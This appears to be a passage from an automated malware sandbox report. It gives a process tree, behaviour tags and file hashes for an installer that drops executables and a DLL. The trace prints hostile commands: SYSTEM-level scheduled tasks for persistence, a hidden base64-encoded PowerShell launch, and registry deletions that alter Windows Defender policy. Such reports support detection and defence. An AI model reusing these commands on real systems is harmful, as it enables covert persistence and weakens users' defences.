                                                                                                            2⤵
                                                                                                              PID:528
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /DELETE /F /TN "gTZHaPYyM"
                                                                                                              2⤵
                                                                                                                PID:3184
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /CREATE /TN "RdVNeEHqblJZmHjAZ" /SC once /ST 05:08:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WyLPlDtgpztVObbw\HjlOwAPvSBqKHBw\cGwVNje.exe\" gc /site_id 525403 /S" /V1 /F
                                                                                                                2⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:4844
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /run /I /tn "RdVNeEHqblJZmHjAZ"
                                                                                                                2⤵
                                                                                                                  PID:4228
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:616
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  2⤵
                                                                                                                    PID:220
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:4988
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:1528
                                                                                                                    • C:\Windows\Temp\WyLPlDtgpztVObbw\HjlOwAPvSBqKHBw\cGwVNje.exe
                                                                                                                      C:\Windows\Temp\WyLPlDtgpztVObbw\HjlOwAPvSBqKHBw\cGwVNje.exe gc /site_id 525403 /S
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks computer location settings
                                                                                                                      • Drops Chrome extension
                                                                                                                      • Drops desktop.ini file(s)
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:4628
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /DELETE /F /TN "bdOiBdqpuCkxReDvuQ"
                                                                                                                        2⤵
                                                                                                                          PID:1172
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                          2⤵
                                                                                                                            PID:2004
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:864
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                              2⤵
                                                                                                                                PID:4308
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:4220
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\LxYDbYlnU\HLWvBQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "XkyqUJClrpogjgA" /V1 /F
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:5020
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TN "XkyqUJClrpogjgA2" /F /xml "C:\Program Files (x86)\LxYDbYlnU\HkjHXjB.xml" /RU "SYSTEM"
                                                                                                                                  2⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:3068
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /END /TN "XkyqUJClrpogjgA"
                                                                                                                                  2⤵
                                                                                                                                    PID:3992
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /DELETE /F /TN "XkyqUJClrpogjgA"
                                                                                                                                    2⤵
                                                                                                                                      PID:2056
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "RQngHAoWnqdwoT" /F /xml "C:\Program Files (x86)\mXTnalnaBsbU2\qcCcnRN.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:4876
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "mJDSTuzMWFaxq2" /F /xml "C:\ProgramData\UImdnrqMVCVhDJVB\VGZQrma.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3260
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "YuNvBStVsoDEHdVXz2" /F /xml "C:\Program Files (x86)\lncXcBzRPHdnUZJHbuR\UVwVCnT.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:4788
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "CCcNgQvbLXuaFtwRzHo2" /F /xml "C:\Program Files (x86)\CHuhsCCBcXQwC\xeLeRaD.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:1328
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "nEBPSVRbpCWQzsRgY" /SC once /ST 01:48:25 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WyLPlDtgpztVObbw\DhVpuaUH\hNiRGHB.dll\",#1 /site_id 525403" /V1 /F
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3752
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /run /I /tn "nEBPSVRbpCWQzsRgY"
                                                                                                                                      2⤵
                                                                                                                                        PID:4564
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                        2⤵
                                                                                                                                          PID:3536
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:4504
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                            2⤵
                                                                                                                                              PID:1084
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:2864
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "RdVNeEHqblJZmHjAZ"
                                                                                                                                                2⤵
                                                                                                                                                  PID:2660
                                                                                                                                              • C:\Windows\system32\rundll32.EXE
                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WyLPlDtgpztVObbw\DhVpuaUH\hNiRGHB.dll",#1 /site_id 525403
                                                                                                                                                1⤵
                                                                                                                                                  PID:3712
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WyLPlDtgpztVObbw\DhVpuaUH\hNiRGHB.dll",#1 /site_id 525403
                                                                                                                                                    2⤵
                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:4884
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /DELETE /F /TN "nEBPSVRbpCWQzsRgY"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4632

                                                                                                                                                  Network

                                                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                                                        Replay Monitor

                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                        Downloads

                                                                                                                                                        • C:\Program Files (x86)\CHuhsCCBcXQwC\xeLeRaD.xml

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          04b5c11c97f665c52851db3852609e7a

                                                                                                                                                          SHA1

                                                                                                                                                          67479758483d736b1e0b9930e2f58c45f5c7a0e1

                                                                                                                                                          SHA256

                                                                                                                                                          bfde55cff7918154297f5ff0d7ce9aa1bc88cdf03d330d4cfcf12293220fc975

                                                                                                                                                          SHA512

                                                                                                                                                          295120ca0eb2b7f0c6be06f48938b56aa0910d90c1adcb8bb0115ba33eedd787cbccbba16cf0edceaebd6cc4bc6b2384cb265a0a5b2bc5cb07dcdef0ed66c92d

                                                                                                                                                        • C:\Program Files (x86)\LxYDbYlnU\HkjHXjB.xml

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          9df6a3cc40c476a7bd5f5be87a20c5a3

                                                                                                                                                          SHA1

                                                                                                                                                          c823ecfe8defd51d93a5cb896c3823aba508a289

                                                                                                                                                          SHA256

                                                                                                                                                          45b21edbaf8cbd4a4841615bde21a8c25ae8e4bcdaadf4a55ad8bf2385956418

                                                                                                                                                          SHA512

                                                                                                                                                          9b549e31940a51b91e5ca4fa45136aa02a8b8f16af81e991f0707c7fd721bf097a56881ba73870e68ed48ee6590097409ec7f3064300d14f6e552dc704466aac

                                                                                                                                                        • C:\Program Files (x86)\lncXcBzRPHdnUZJHbuR\UVwVCnT.xml

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          cb0b862db63caf9f178a6d123dd964ac

                                                                                                                                                          SHA1

                                                                                                                                                          682a4b5f16eb43866ca8ac18772e0391308bb62b

                                                                                                                                                          SHA256

                                                                                                                                                          12b7fca7cc0a01b32d590f0e316d64b5e86f06a09c74f14d4edea356015cc0b5

                                                                                                                                                          SHA512

                                                                                                                                                          1b36498319e012db5ef9cf63695f6cebb8e5092a4faf1502f38e86b3e9ed0b5d5376e1fb3cebd8123b0c071be77954488cfd0dcab81dcf75b3f6a40cafaf8b1b

                                                                                                                                                        • C:\Program Files (x86)\mXTnalnaBsbU2\qcCcnRN.xml

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          462430898af2ca7c0a4b6733e2f88550

                                                                                                                                                          SHA1

                                                                                                                                                          b4c9e341a45c2fdf64c047844d1f7dab7625580b

                                                                                                                                                          SHA256

                                                                                                                                                          f91ebff0ce6f722d3d6bfe1ba291359d84a04fc7f449dcbaad195d5776e10a1f

                                                                                                                                                          SHA512

                                                                                                                                                          c1110f48c9e9b72447bfd8519e007ba9cf18160683a2e3b4c0e758d106e0ecc6ffc4bb713dbc59ffe81cb264c75b8d4dda6934dfa567b1e3791184c6706ed93e

                                                                                                                                                        • C:\ProgramData\UImdnrqMVCVhDJVB\VGZQrma.xml

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          de2454e4fa2e5e8792534f408d0ccc86

                                                                                                                                                          SHA1

                                                                                                                                                          43ee1b234c9fd292846db6a626b0d01d526eda14

                                                                                                                                                          SHA256

                                                                                                                                                          fbdd6b88df76c3e34451f4bab55b80d18687781f820ed0cce5be9a72465f7dd1

                                                                                                                                                          SHA512

                                                                                                                                                          7a59eeff417e80ddf71f5836ed172a6a61a0ecca339c0ea7d47c3355e91eb6851b4dc202a74fbf3073e999abd5469d0969428153ecb99ad4dfff7b79f0d30a5f

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                          SHA1

                                                                                                                                                          24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                          SHA256

                                                                                                                                                          b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                          SHA512

                                                                                                                                                          0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                          Filesize

                                                                                                                                                          64B

                                                                                                                                                          MD5

                                                                                                                                                          0ff7e1af4cc86e108eef582452b35523

                                                                                                                                                          SHA1

                                                                                                                                                          c2ccf2811d56c3a3a58dced2b07f95076c6b5b96

                                                                                                                                                          SHA256

                                                                                                                                                          62ed8ef2250f9f744852cb67df0286c80f94e26aed646989b76e5b78f2f1f0d0

                                                                                                                                                          SHA512

                                                                                                                                                          374675fd36cd8bc38acaec44d4cc855b85feece548d99616496d498e61e943fd695fec7c57550a58a32455e8b21b41bafa18cd1dadac69676fff1de1a56da937

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSA27E.tmp\Install.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.3MB

                                                                                                                                                          MD5

                                                                                                                                                          fad0348761a5eb1c6c566b90ac5b0c43

                                                                                                                                                          SHA1

                                                                                                                                                          c5b0d495adb9f88965b513dbd5d58bd5409551f1

                                                                                                                                                          SHA256

                                                                                                                                                          645b34a3be5f47b0a7af447ae87a232e051595954f1c5c26428f844aa150e6a0

                                                                                                                                                          SHA512

                                                                                                                                                          cb0cc9886c518b506bc0b3d763260f20ccb7b890104375036daea74d5447f7588e4d50d7ea7fd996c47d96d3717b44257b93c95dc2ee9fc71b75b0cf353f8744

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSA27E.tmp\Install.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.3MB

                                                                                                                                                          MD5

                                                                                                                                                          fad0348761a5eb1c6c566b90ac5b0c43

                                                                                                                                                          SHA1

                                                                                                                                                          c5b0d495adb9f88965b513dbd5d58bd5409551f1

                                                                                                                                                          SHA256

                                                                                                                                                          645b34a3be5f47b0a7af447ae87a232e051595954f1c5c26428f844aa150e6a0

                                                                                                                                                          SHA512

                                                                                                                                                          cb0cc9886c518b506bc0b3d763260f20ccb7b890104375036daea74d5447f7588e4d50d7ea7fd996c47d96d3717b44257b93c95dc2ee9fc71b75b0cf353f8744

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSA5E9.tmp\Install.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.9MB

                                                                                                                                                          MD5

                                                                                                                                                          98f3f2b97291c0424b1c7d423a2c2d76

                                                                                                                                                          SHA1

                                                                                                                                                          68b5ece26af948ad1ab0af458bfb4ea1db4a3122

                                                                                                                                                          SHA256

                                                                                                                                                          6c8a68aa20ddaf47b960eb1294a8ca4c301d837ddb76fa894fdbd84bfadb9ba9

                                                                                                                                                          SHA512

                                                                                                                                                          08696ba9b25f26d6ac7e0157b2540b1350367d37bc97c3f30d4ce8cfb50a39d1998eb7557c1c011d856612554ab2d00bd72792ed974e257f882119f2fd23cc20

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSA5E9.tmp\Install.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.9MB

                                                                                                                                                          MD5

                                                                                                                                                          98f3f2b97291c0424b1c7d423a2c2d76

                                                                                                                                                          SHA1

                                                                                                                                                          68b5ece26af948ad1ab0af458bfb4ea1db4a3122

                                                                                                                                                          SHA256

                                                                                                                                                          6c8a68aa20ddaf47b960eb1294a8ca4c301d837ddb76fa894fdbd84bfadb9ba9

                                                                                                                                                          SHA512

                                                                                                                                                          08696ba9b25f26d6ac7e0157b2540b1350367d37bc97c3f30d4ce8cfb50a39d1998eb7557c1c011d856612554ab2d00bd72792ed974e257f882119f2fd23cc20

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\odbYVuHqBqRYemqAL\KSAEuFWCcrHcAGV\uImCXpn.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.9MB

                                                                                                                                                          MD5

                                                                                                                                                          98f3f2b97291c0424b1c7d423a2c2d76

                                                                                                                                                          SHA1

                                                                                                                                                          68b5ece26af948ad1ab0af458bfb4ea1db4a3122

                                                                                                                                                          SHA256

                                                                                                                                                          6c8a68aa20ddaf47b960eb1294a8ca4c301d837ddb76fa894fdbd84bfadb9ba9

                                                                                                                                                          SHA512

                                                                                                                                                          08696ba9b25f26d6ac7e0157b2540b1350367d37bc97c3f30d4ce8cfb50a39d1998eb7557c1c011d856612554ab2d00bd72792ed974e257f882119f2fd23cc20

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\odbYVuHqBqRYemqAL\KSAEuFWCcrHcAGV\uImCXpn.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.9MB

                                                                                                                                                          MD5

                                                                                                                                                          98f3f2b97291c0424b1c7d423a2c2d76

                                                                                                                                                          SHA1

                                                                                                                                                          68b5ece26af948ad1ab0af458bfb4ea1db4a3122

                                                                                                                                                          SHA256

                                                                                                                                                          6c8a68aa20ddaf47b960eb1294a8ca4c301d837ddb76fa894fdbd84bfadb9ba9

                                                                                                                                                          SHA512

                                                                                                                                                          08696ba9b25f26d6ac7e0157b2540b1350367d37bc97c3f30d4ce8cfb50a39d1998eb7557c1c011d856612554ab2d00bd72792ed974e257f882119f2fd23cc20

                                                                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                          Filesize

                                                                                                                                                          1KB

                                                                                                                                                          MD5

                                                                                                                                                          33b19d75aa77114216dbc23f43b195e3

                                                                                                                                                          SHA1

                                                                                                                                                          36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                                                                                                          SHA256

                                                                                                                                                          b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                                                                                                          SHA512

                                                                                                                                                          676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                          Filesize

                                                                                                                                                          11KB

                                                                                                                                                          MD5

                                                                                                                                                          5b3839b2f6359dde1b4ef6986f98baa4

                                                                                                                                                          SHA1

                                                                                                                                                          cf4273d063daf71dcc4aa6576d8c71d672db262f

                                                                                                                                                          SHA256

                                                                                                                                                          f3d9f9ba31217b2aff69fb38e404fabb0bef8e4c322f8fb958857145dde98ec2

                                                                                                                                                          SHA512

                                                                                                                                                          179f11b55e2047fcce729edfc96d7ca981c7619d69a41e81616c89fd83237ed26bcf2d073bf4182391b9697a3742a2669eaf428ddd290cc08ad9417e0ee4b9a4

                                                                                                                                                        • C:\Windows\Temp\WyLPlDtgpztVObbw\DhVpuaUH\hNiRGHB.dll

                                                                                                                                                          Filesize

                                                                                                                                                          6.2MB

                                                                                                                                                          MD5

                                                                                                                                                          2a9f46fe9933e408367c68534babc2db

                                                                                                                                                          SHA1

                                                                                                                                                          8edaa95aad12243d958f0f13a9a0cc1d89ad6d75

                                                                                                                                                          SHA256

                                                                                                                                                          5f463bd93d2f829773aa6ce7ecbfd5dc981dc6241676f5a7d2900ba1c1a841a0

                                                                                                                                                          SHA512

                                                                                                                                                          b03ae02fdb4e0e3540e3ca46777e751e9259548703d39deb021c363af424113dd19350220cb5d6072496d07a6fa14d3448426b921cbf00261ad7743f4127f7a1

                                                                                                                                                        • C:\Windows\Temp\WyLPlDtgpztVObbw\DhVpuaUH\hNiRGHB.dll

                                                                                                                                                          Filesize

                                                                                                                                                          6.2MB

                                                                                                                                                          MD5

                                                                                                                                                          2a9f46fe9933e408367c68534babc2db

                                                                                                                                                          SHA1

                                                                                                                                                          8edaa95aad12243d958f0f13a9a0cc1d89ad6d75

                                                                                                                                                          SHA256

                                                                                                                                                          5f463bd93d2f829773aa6ce7ecbfd5dc981dc6241676f5a7d2900ba1c1a841a0

                                                                                                                                                          SHA512

                                                                                                                                                          b03ae02fdb4e0e3540e3ca46777e751e9259548703d39deb021c363af424113dd19350220cb5d6072496d07a6fa14d3448426b921cbf00261ad7743f4127f7a1

                                                                                                                                                        • C:\Windows\Temp\WyLPlDtgpztVObbw\HjlOwAPvSBqKHBw\cGwVNje.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.9MB

                                                                                                                                                          MD5

                                                                                                                                                          98f3f2b97291c0424b1c7d423a2c2d76

                                                                                                                                                          SHA1

                                                                                                                                                          68b5ece26af948ad1ab0af458bfb4ea1db4a3122

                                                                                                                                                          SHA256

                                                                                                                                                          6c8a68aa20ddaf47b960eb1294a8ca4c301d837ddb76fa894fdbd84bfadb9ba9

                                                                                                                                                          SHA512

                                                                                                                                                          08696ba9b25f26d6ac7e0157b2540b1350367d37bc97c3f30d4ce8cfb50a39d1998eb7557c1c011d856612554ab2d00bd72792ed974e257f882119f2fd23cc20

                                                                                                                                                        • C:\Windows\Temp\WyLPlDtgpztVObbw\HjlOwAPvSBqKHBw\cGwVNje.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.9MB

                                                                                                                                                          MD5

                                                                                                                                                          98f3f2b97291c0424b1c7d423a2c2d76

                                                                                                                                                          SHA1

                                                                                                                                                          68b5ece26af948ad1ab0af458bfb4ea1db4a3122

                                                                                                                                                          SHA256

                                                                                                                                                          6c8a68aa20ddaf47b960eb1294a8ca4c301d837ddb76fa894fdbd84bfadb9ba9

                                                                                                                                                          SHA512

                                                                                                                                                          08696ba9b25f26d6ac7e0157b2540b1350367d37bc97c3f30d4ce8cfb50a39d1998eb7557c1c011d856612554ab2d00bd72792ed974e257f882119f2fd23cc20

                                                                                                                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                          Filesize

                                                                                                                                                          5KB

                                                                                                                                                          MD5

                                                                                                                                                          e4f3f62323c8e0cba6ecd3e91968331d

                                                                                                                                                          SHA1

                                                                                                                                                          187f37d3d11c4b3435a9676ed98075e7cf8b79ce

                                                                                                                                                          SHA256

                                                                                                                                                          a3011d918191f9b135e9f160cbb9089e05daeb992020f2aee5be1cfac46be80d

                                                                                                                                                          SHA512

                                                                                                                                                          ce15e8d62b1cf0c631f31b675de9e5e9c2bf858284b76d919b468846b0f74c2c8832bd933a8ea96b58c029dd25366ef78fe320bcc1eb85c4b69ccd7e0b00e37d

                                                                                                                                                        • C:\Windows\system32\GroupPolicy\gpt.ini

                                                                                                                                                          Filesize

                                                                                                                                                          268B

                                                                                                                                                          MD5

                                                                                                                                                          a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                          SHA1

                                                                                                                                                          1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                          SHA256

                                                                                                                                                          9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                          SHA512

                                                                                                                                                          9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                        • memory/532-159-0x0000000010000000-0x00000000108DD000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          8.9MB

                                                                                                                                                        • memory/616-220-0x00007FFBFE700000-0x00007FFBFF1C1000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/3436-163-0x0000000003E90000-0x0000000003EC6000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          216KB

                                                                                                                                                        • memory/3436-164-0x0000000004570000-0x0000000004B98000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          6.2MB

                                                                                                                                                        • memory/3436-165-0x00000000044B0000-0x00000000044D2000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          136KB

                                                                                                                                                        • memory/3436-166-0x0000000004D50000-0x0000000004DB6000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          408KB

                                                                                                                                                        • memory/3436-167-0x0000000004DC0000-0x0000000004E26000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          408KB

                                                                                                                                                        • memory/3436-168-0x0000000005450000-0x000000000546E000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          120KB

                                                                                                                                                        • memory/3472-138-0x0000000010000000-0x00000000108DD000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          8.9MB

                                                                                                                                                        • memory/4224-151-0x00000288F6630000-0x00000288F6652000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          136KB

                                                                                                                                                        • memory/4224-152-0x00007FFBFE9F0000-0x00007FFBFF4B1000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/4224-154-0x00007FFBFE9F0000-0x00007FFBFF4B1000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/4628-228-0x0000000007890000-0x0000000007915000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          532KB

                                                                                                                                                        • memory/4628-232-0x0000000007EE0000-0x0000000007F40000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          384KB

                                                                                                                                                        • memory/4628-246-0x0000000008990000-0x0000000008A49000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          740KB

                                                                                                                                                        • memory/4628-242-0x0000000008850000-0x00000000088C8000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          480KB

                                                                                                                                                        • memory/4884-249-0x0000000001D20000-0x00000000025FD000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          8.9MB